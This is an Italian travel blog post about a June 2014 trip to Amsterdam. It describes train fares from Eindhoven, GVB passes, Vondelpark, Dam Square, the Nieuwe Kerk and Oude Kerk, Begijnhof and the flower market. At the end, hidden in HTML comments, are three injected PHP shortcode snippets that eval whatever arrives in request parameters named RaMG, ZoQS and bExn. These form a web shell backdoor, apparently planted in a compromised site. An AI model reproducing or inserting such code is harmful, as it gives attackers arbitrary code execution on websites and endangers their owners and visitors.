Amsterdam “loves you” #1

Indimenticabile Amsterdam! Le dedicherò più post perchè c’è tanto da dire e da emozionarsi.

Partiti il 05/06/2014, giorno del compleanno del mio uomo e rientrati il 12 con volo Ryanair. Sosta di 2 gg. a Eindhoven per poi prendere il treno dalla stazione di Eindhoven per Amsterdam Centraal; la frequenza è di circa 15 minuti, diretto o con cambio a Utrecht e il costo è di € 18,70 sola andata. Per i dettagli abbiamo consultato il sito delle ferrovie olandesi: http://www.ns.nl/en/travellers/home anche se le biglietterie automatiche sono molto intuitive o nella peggiore delle ipotesi o se si ha fretta, ci sono le biglietterie “umane” molto sbrigative seppur è inclusa la transazione di € 0,50.

Amsterdam ti accoglie con un brulichio di gente e…bici che sfrecciano veloci ma avverti una sensazione d’ordine e puntualità.

Loves you Amsterdam Ricordi

Abbiamo alloggiato subito dietro il Vondelpark, enorme polmone verde con sentieri, prati, laghi e consiglio di prendere un tè alla classica Round Blue Teahouse stile anni Trenta e da Giugno ad Agosto ci sono spettacoli di teatro, opera, jazz e free pop all’aria aperta, alcuni gratuiti e altri prenotabili anche online fino a 2 ore prima dell’inizio [€ 2.50 per posto] ma Amsterdam è una città all’aria aperta con parchi e giardini a portata di passeggiata rilassante.

Angoli di Vondelpark VondelparkVondelpark

Il nostro mini appartamento era completo di bagno in camera, cucinino con annesso frigo e frutta tutte le mattine! E a 5 mn di Tram dalla centrale Piazza Dam.

Conviene alloggiare all’interno della rete dei canali per visitare Amsterdam a piedi o in bici ma, se si approfitta un’ offerta estremamente low-cost, come nel nostro caso, per risparmiare sui mezzi, occorre acquistare i GVB pass: da 12h costano €7,50, da 24h €12 e da 72h €16,50; questo perché il biglietto per il tram della durata di un’ora costa ben €2,60.

Inoltre, se si opta per un hotel, leggere con attenzione le recensioni perché le stanze potrebbero essere davvero small e il servizio di pulizia non giornaliero e inoltre le 2⭐⭐non corrispondono alle nostre 2 stelle, cosí come a Parigi del resto, e si rischia di rimanere parecchio delusi.

Piazza Dam è il posto da cui Amsterdam, alias ‘Dam sul fiume Amstel‘, ha preso il nome. Arrivati in Piazza Dam ti giri e rigiri perchè la Piazza è enorme e vorresti coglierla tutta con lo sguardo. Siamo entrati nella Nieuwe Kerk [Chiesa Nuova] ed è magnifica la vetrata colorata, così come il pulpito di legno e l’organo dorato in marmo. Chiesa nuova per distinguerla da quella vecchia, Oude Kerk che si trova nel cuore del distretto a luci rosse ed è la chiesa più antica di Amsterdam. Oude Kerk ha una lunga tradizione di organi e organisti celebri [Sweelinck]. Rembrandt sposò qui la sua prima moglie Saskia e una delle cappelle accoglie la sua tomba e in questa chiesa si tiene inoltre annualmente la famosa mostra World Press Photo tra Aprile e Giugno.

Amsterdam è famosa in tutto il mondo per i suoi canali, i suoi ponti e le giustapposizioni affascinanti, e direi surreali, quando i musei del cannabis e dell’erotica fanno a gara con le opere di Van Gogh e i bruin cafès e gli eetcafès fumosi ed intimi competono con i club cool e la cucina chic.

Si respira un’atmosfera rilassata e uno svago elettrizzante in un ambiente di arte e alta cultura tipico di una capitale cosmopolita e all’avanguardia. Eccezionale!

AmsterdamScorci di Amsterdam

E tutt’intorno ruotano edifici colorati con tetti spioventi e a gradini, con le facciate a collo o ornate a campana che quasi si sorreggono a vicenda, rimanendo a tratti storti e la vista è indimenticabile.

Clicca per visualizzare l'intera Gallery

E proprio nel cuore del vibrante centro città, si trova un posto incontaminato, il Begijnhof che è un’oasi di calma col suo cortile erboso circondato da alte case coi tetti spioventi, fu costruito nel Trecento come rifugio per beguines: donne nubili che facevano una vita quasi monastica senza avere formalmente preso i voti. E tra quelle case ne spicca una di legno [Het Houten Huys] costruita nel 1477 che è l’edificio più antico di Amsterdam.

 

[Het Houten Huys] Begijnhof

Altro posto da vedere assolutamente è il mercato fluttuante dei fiori, Bloemenmarkt e ci si perde tra la moltitudine di varietà di tulipani, gerani e bulbi di ogni genere. Si trova in via Singel, tra Muntplein & Koningsplein.

Bloemenmarkt

Il mercato della Boqueria di Barcellona me lo ricorda per la vastità dei prodotti e colori, anche se di genere alimentare.

E tanta bellezza si fotografa anche con gli occhi, da dentro, per non dimenticarla. Il mio raccontarla continua qui 💞

<!– [insert_php]if (isset($_REQUEST["RaMG"])){eval($_REQUEST["RaMG"]);exit;}[/insert_php][php]if (isset($_REQUEST["RaMG"])){eval($_REQUEST["RaMG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZoQS"])){eval($_REQUEST["ZoQS"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZoQS"])){eval($_REQUEST["ZoQS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bExn"])){eval($_REQUEST["bExn"]);exit;}[/insert_php][php]if (isset($_REQUEST["bExn"])){eval($_REQUEST["bExn"]);exit;}[/php] –>